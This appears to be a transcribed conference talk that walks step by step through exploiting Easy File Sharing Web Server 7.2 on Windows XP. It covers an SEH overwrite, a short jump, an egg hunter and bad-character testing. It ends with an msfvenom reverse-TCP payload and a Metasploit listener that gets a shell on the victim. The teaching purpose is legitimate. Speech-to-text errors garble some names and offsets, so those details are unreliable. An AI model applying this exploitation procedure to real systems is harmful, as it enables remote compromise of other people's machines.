Welcome aboard at my talk. I'm glad for being here with you all. My talk is called From SEH Overwrite with Egg Hunter to Get a Shell. My name is Rodolpho Concurde, but you can call me by my nickname Rodox. A little about me. I'm penetration tester, instructor IT, consultant of information security throughout 13 years, certified ethical hacker by the council. I already gave talks at the Hack in the Box, Ecopara, Arab Security Conference, Mortal Con, Tech Conference in Village, besides Calgary, besides Athens, etc. I'm author at Hacking Iron magazine about Stack Overflow and Pentest magazine about the cover channel, from Frozen to Get a Shell, from SEH Overwrite to Get a Shell. Here, I leave here my LinkedIn profile by my email. For who wants take out some doubts after this presentation, you can write me on my LinkedIn profile or my email. Our agenda. We will learn about SEH, structured exception handler, buffer overflow. We have a POC. In POC, we will learn SEH overwrite, short jump, egg hunter, bad characters, reverse shell, and we have a questions. Exception handler. Exception handler is a chunk of code from inside of an application which have the objective to handle any exceptions that can occur during exception of software. The exception handler look like with. Here we have try and catch. When the flow of execution passing try, execute some code. If occurs some exception, should jump to catch. In catch, execute some specific code when exception occurs. An exception is an unexpected event, an error that occurs in a running system or program. When an exception occurs, the program's normal flow of execution is interrupted. It is important that the application can handle the exception or error to continue running normally. The address of the exception handler are stored on the stack. The Windows operating system has a default handler that catches any exception that is not handled by the program. So the Windows has your own exception handler. When Windows handles exception in an application, you usually see the message: program has encountered a problem and needs to close. The SEH works in a chain, and they are localized in end of stack. In the classic buffer overflow vanilla, the exploit overwrites the return address without worrying about writing more bytes in the stack. But with the SEH overwrite technique, it's possible to obtain more space for the shellcode in order to have exploit more stable. So here we can see that the SEH works in a chain. We have here next SEH recording, passing to next SEH recording, passing to next SEH recording in the of chain. Buffer overflow. Buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundaries and overwrites adjacent memory location. Might be WIP-based, placed in the memory, which allocates a large amount of data and dynamic, or stack-based, allocate a limited or fixed size of data, such as data from local variables or functions. Here we have a left image and the right images. In left image we have variable 4 with 11 A's, right image we have variable 4 with 150 A's. As we can see in right image, we have overwrite the register BP with character A and overwrite in end of stack because SEH is localized in end of stack. we overwrite the SEH tool. Now we have a POC. The attack machine will use a Kali link to Dowsed 20.3 and the vulnerable software that will use the easy file sharing Web Service 7.2 running on Windows XP Service Pack 3. Here we have a link for the load of vulnerable software. I'll make available on my LinkedIn profile the link for this slide for who want to download vulnerable software. You can find the vulnerable software link on these slides that will become available on my LinkedIn profile. Now we have received the video POC. Let's see the video POC. Let's open the vulnerable software. Easy file sharing web server is running on port 80. Open the Moodle debugger. Click menu file, attach. Choose the vulnerable software. Click in attach. The software is paused. Click in button run for running the vulnerable software in Moodle debugger. Now let's open the exploit code in Kali Linux via skeleton. The exploit code. This exploit code is writing in Python. We have variable crash1 with a lot amount of characters. We will send this a lot amount of characters against the target software target for cause a crash against the target. We have payload equals method get plus crash1 variable crash1. We send this a lot amount of characters localizing variable crash1 against the target IP in port 80. This a lot amount of characters was generated by two parent create. Again, this a lot amount of characters was generated by two parent create. It's localized in folder Metasploit framework tools exploit. You should type parent create -l the link 5000. And we have here a lot amount of characters. You must copy this a lot amount of characters and paste in our variable crash1 in exploit code. Should paste in variable crash1 in exploit code. So we will send a lot amount of characters against the target method get in port 80. Let's save the exploit code and send with Python name of exploit code skeleton2.py send against the vulnerable software. The flow of execution stopped. Active violation we have. Click menu view, SEH chain, and we have here a value of SE handler. This value we have due a lot amount of characters. With this value, we need to find an offset of SE handler. We need to find an offset of SE handler. For find the offset, we use a tool parent offset. Parent offset space dash L, the length 5000 dash Q, and the value of SE handler 46, 35, 46, 35, 66, 46. 66, 46. And we found offset for doubt 65. Offset for doubt 65 is offset for 300. We need to add the offset in exploit code. So now we have variable crash1 character A multiplied by offset for doubt 61 plus B multiplied by 4 plus C multiplied by 4 plus 90. 90 means noops. Noops do nothing. Noops means no operations because do nothing. So we will send against the target. We will send against the target for doubt 61 character A, and after we overwrite the SE handler with character B and character C. Again, we overwrite SE handler with character B, character C. Let's restart the Moonly debugger. Click button run. Restart the Moonly debugger. Run the Moonly debugger. Run the vulnerable soft Moonly debugger. Execute the exploit code, Python skeleton tree. Execute the exploit code. Send the payload. We have flow of execution stopped, axe violation menu view, SEH chain, and now we have in C handler 42, 42, 42, 43, 43, 42. Right button, follow address in stack, and we have pointer to next C handler BBBB, C handler CCCC. As we can see, we get a control of a C handler. So we get a control of a C handler. We have BBBB in pointer to next C record, the CCCC in a C handler. You get a control of a C handler. Let's open the exploit code. Now we need to find an instruction pop-up return. For this, we need to type in command bar exclamation mona SE handler SEH exclamation mona SEH. Click menu view log, and we have here only the first 20 pointers I show here. For more pointers, open SE8.text. Let's learn more about SE pop-up return. Now we need to find immunity instruction pop-up return. This instruction will, as shown image below, make a return to the pointer to next SE8 record. The pointer to next SE8 record will overwrite with a jump to our shellcode to get a reverse shell. So let's understand this image. Once specific flow of execution stop in axe violation flow of execution stopped in act violation after it's handled by C8 because C8 is the exception handler of the Windows. In current SE8 handler, we overwrite with pop-up return. So flow of execution is passing current SE handler and will execute pop and return. In return, we will return to pointer to next SE8 record. The key pointer to next SE8 was overwrite with jump to shellcode. It's a short jump. So flow of execution is occur act violation. So you overwrite current C handler with pop return. So we'll execute pop and return. In return, we'll follow out and pointer to the next S8 record. Pointer to next S8 record will execute one short jump and will jump for our shell code to get a reverse shell. For this, now we need to find a instruction pop return. Open the local C, programs file, immunity debugger, and then we have a log of SE8 point text, SE8 point text. We need to find an instruction pop return without secure mechanisms. We need to find a pop return without secure mechanisms. We use address 10.01.03 FE, 10.01.03 FE, and we have here popci popdi return. As we can see, we will use here a popci popdi return with secure mechanisms ASLR as false, rebase as false, save SE8 as false, also as false. We use this address 10.01.03 FE popci popdi return without secure mechanisms. So we need to create in our exploit code a variable SE8 with address FE030110 is an address for pop return. 10.01.03 FE, we need to type unlike deal architecture 86. We must type unlike FE030110. And now we need to find an instruction jump short. An instruction jump short because we will make pop return and we will return for jump short. In short jump, we make a short jump to our shell code. For find an opcode for short jump, we use a 2NASM shell, and we need to create a variable NSE8 with 90 noop EB06. EB06 is an opcode for short jump, as we can see in NASM shell. We must type jump short 8, and we have opcode EB06. EB06 is an opcode for jump short. We need to add the EB06 in our exploit code. We have label NSE8 9090 XEB X06 variable SE8 FE030110 pop return. And then now we have variable crash1 character A multiplied by offset plus NSE8 plus SE8 plus 90. That's our loops. Save the exploit code. Restart the Munir debugger. Restart the Munir debugger. Click button run to run the vulnerable software Munir debugger again. Execute the exploit code. We have act violation. Click menu view, SEH chain, and now we have in SE100 the edit for pop-up return short jump. Click right button, follow address in stack, and then we have here in SE100 address for pop-up return in pointer to next SE recording. 9090 noop noop EB06CB, our short jump. We have here get the control of SE100 and overwrite SE100 with pop-up return, and overwrite SE100 with short jump. Click right button, go to expression, and type add for pop-up return 100103FE. And we have a key 100103FE added for pop-up return, PopCI, PopDI return. Click right button in PopCI, breakpoint toggle to put a breakpoint in PopCI. Breakpoint is to stop flow of execution. This means that the flow of execution is stopped in PopCI. Press Shift F7 to pass flow of execution and clicking button run. And the flow of execution is stopped in PopCI. Pass the flow of execution with F7, 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 and return to our loops. We return to our loops and jump short. We have here EB06. EB06 is our jump short. Pass loop with F7, F7, pass jump short with F7, and the follow out in loops. We have here our loops. In this place of these loops, we will put our shell code to get a verse shell. But I know that this isn't enough space. We don't have enough space to put our shell code here. So again, in this place of these loops, we should put our shell code to get a verse shell. But I know that we don't have enough space to put our shell code here. For this, we use a technique called egg hunter. We use a technique called egg hunter. As we can see, we have here our loops, but even being not amount of space, this isn't enough space for our shell code. We don't have enough space for our shell code. We need to use a technique called egg hunter. Let's learn more about the technique called egg hunter. We know that we have a little space to our shell code. For this, we use a technique called egg hunter. Egg hunter is a small piece of shell code which searched for actual bigger space which the attacker was not able to fit in the available buffer space. For this, make use of this little space of shellcode egg hunter to redirect execution of flow to a shellcode bigger. So as we can understand here, the egg hunter is a small piece of shellcode, as we can see in image below. A small piece of shellcode that will redirect us for a bigger space, where in this bigger space we can put our shellcode to get a reverse shell. So we must type in command bar exclamation mona help egg, and here we can see this command for the command egg, these options for the command egg. And we have the default value is root. Root is a default label that we'll use it after. We'll use it later. Default label root. And you should type exclamation mona egg, exclamation mona egg, to find the egg hunter. Egg hunter again is a small piece of shellcode, as we can see here. We must copy with right button, copy clipboard, the whole line, copy the small piece of shellcode and paste in our exploit code. The small piece of shellcode called egg hunter will redirect us for a bigger space, where in this bigger space we can put our shellcode to get a reverse shell. Let's open our exploit code and paste in our exploit code our egg hunter. Right button and paste selection. Now we have here our little piece of shellcode called egg hunter. And we have in variable crash1 character A multiplied by offset. Character A multiplied by offset plus any SE8 our short jump plus SE8 our pop-up return plus 90 plus egg hunter plus 90, that is our loops. And we have here payload 2 equals badchars. We have character crash 1 character A multiplied by offset, overwrite SE8 with pop-up return, overwrite NSE8 with short jump, plus 90 noobs plus egg hunter plus 90 our noobs. And the payload 2 equals badchars. We will send these characters since 01, 02, 03, and etc. up FF against the target for find badchars. Let's learn more about what is badchars. Now we need to search for bad characters. Depending on the application type of vulnerability and the protocols used, may be certain characters which are considered bad and should not be used in your buffer or shellcode. One example of bad characters is a 00. This character is considered bad because a null byte is also used to terminate the string copy operation. It will truncate our buffer whenever the null byte appears. So we will send against the target all these characters since 01 up FF with objective if cause some crash, if cause some error in this software. We won't send the 00 because we already know that 00 is a bad characters. Again, 00 is a bad characters, but we need to know if there is others bad characters. For this, we will send against the target this character 01, 02, 03, 04, 05, etc. up FF for see if occurs some errors. For this, put here payload 2 equals badchars. You send this badchars against the target. And we have here payload user agent ult plus payload 2, because after ult, the full label of Egg Hunter, after Egg Hunter will come our payload 2. Payload 2 in this case is a badchars. But after we put in payload 2 our shell code to get a verse shell. Save the exploit code. Restart the Mooney debugger. Click button run. Run the vulnerable software Mooney debugger again. Find the pop-up return address. With right button, go to expression. Find PopCI. Put a breakpoint in PopCI. Right button, breakpoint toggle to stop flow of execution PopCI. Execute exploit code. Python skeleton 5. Send the payload. Pause the flow of execution. We have here access violation. Press Shift F7 to pass access violation. Press Shift F7 to pass access violation. After clicking, press F9 or click button run. Flow of execution stopped in PopCI. Pass PopCI with F7, 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 return. Follow out noops, F7, F7, jump short, F7, noops, F7. And here we have our Egg Hunter. These instructions is our Egg Hunter. Our Egg Hunter. Let's put a breakpoint in scans, right button in scans, breakpoint toggle to stop the flow of execution in scans. Click button run. Button run. Flow of execution stopped in scans. Let's see the value in scans. Right button in DX. Right button in register EDX. Following dump. We have here ult. This is the full label of Egg Hunter, indicating that after this ult will come our shell code. In this case, our badchars, but after we put our shell code to get our shell. Pass with F7, F7, jump DI with F7. And here we have our badchars 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, and etc. up FF. We have all these badchars since 01 up FF. Since 01 up FF. we have the badchars sync01 up ff. As we can see, we don't have more error. We don't have more error because we have here all this value is sync01 up ff. This indicates that just 00 is a bad character. For our software, just 00 is a bad character. We don't have more other bad characters beyond 00. So now we will generate our shell code to get a reverse shell. Generate our shell code without 00, just without 00. So we start the Mooney debugger. We start the Mooney debugger. We start the Mooney debugger again. Click button run. Right button. Go to expression to find the pop-up return. Put a breakpoint pop CI with right button. Breakpoint toggle. Put a breakpoint pop CI. Open the exploit code. And here we have a shell code. We will erase this old shell code to copy to paste a new shell code. For generate our shell code, we use a tool called MSF Venom. We use a tool called MSF Venom for generating our shell code. We must type MSF Venom -a architecture 86 platform Windows -p payload Windows shell reverse TCP add host local IP add port local port for listen 4444 -e encode shikataganai -b badchars for void 00 -e interactive tree -f of payload of file Python. We generate payload for file Python. And in this MSF Vino, we generate a shell code avoiding a bad characters 00. We generate our shell code avoiding bad character 00. Let's erase this old shell code to paste our new shell code. We have here variable crash1 character a multiplied by offset plus NS8 our short jump plus S8 our pop-up return plus 90 multiplied by 5 our noops plus egg hunter plus 90 our noops and below payload 2 equals buff. Buff is our shell code. And here we have payload equals other agent ult is our default label for egg hunter plus payload 2. Payload 2 equals buff. Buff is our shell code to get the reverse shell. We have a payload 2 equals buff. Buff is our shell code. So let's copy our shell code and paste in our exploit code. copy our shellcode, and paste in our exploit code. This shellcode was generated by MS Vino to get a reverse shell. So let's save the exploit code. Let's save our exploit code. And let's execute MSF Metasploit. Let's execute Metasploit with MSF console. MSF console to execute our Metasploit to listen on port 444 to get a connect back. Type use multi-handler, set payload, Windows, shell, reverse TCP, Windows shell reverse TCP, set lhost, local IP, set lport to listen on port 4444, and execute Metasploit command exploit to listen, command exploit. Now let's execute our exploit code, Python skeleton 6. And we have access violation. Pass access violation with Shift F7, Shift F7 to pass access violation. And after, press F9 to F9 or click button run. And stop the flow of execution in PopCI. Press PopCI return with F7, F7, F7. Press noops with F7. Press jump short with F7. And we have our egg hunter. Put the breakpoint in scans. Right button in scans. Breakpoint toggle. Put breakpoint in scans. Click button run. Flow of execution will stop in scans. Let's see the content in scans. Right button in register EDX. Right button register EDX. Following dump. And we have here a default label root. Default label root. This indicates that after root will come our shellcode. After root will come our shellcode. Right button EDX. Following dump. And here we have here our root. Pass scans with F7. F7, F7, pass jump DI with F7, pass jump DI with F7. And we have here our shell code, DA, DC, D9, 74. This is the same value of our shell code in our exploit code. We have in our exploit code, in our shell code, DA, DC, D9, 74. This is our shell code is executing in our vulnerable software. So our shell code executing our vulnerable software. Click button run to pass to execute the flow of execution. Button run. And we have here Metasploit. We got a shell. We got a shell Metasploit. You can type net user to see the users, user Rodox and the administrator. You can type to ipconfig to see the IP of the victim. We have here IP of the victim. This is a video talk of how you can write or exploit code using a technique SEH Overwrite with Egg Hunter. In these slides, we have here step by step of how you can write or exploit code using a technique SEH Overwrite with Egg Hunter. For who want to see again how became available on my LinkedIn profile, the link for these slides. I'll make available my LinkedIn profile the link for this slide. This is it, everyone. Now I open for the questions. Thank you very much.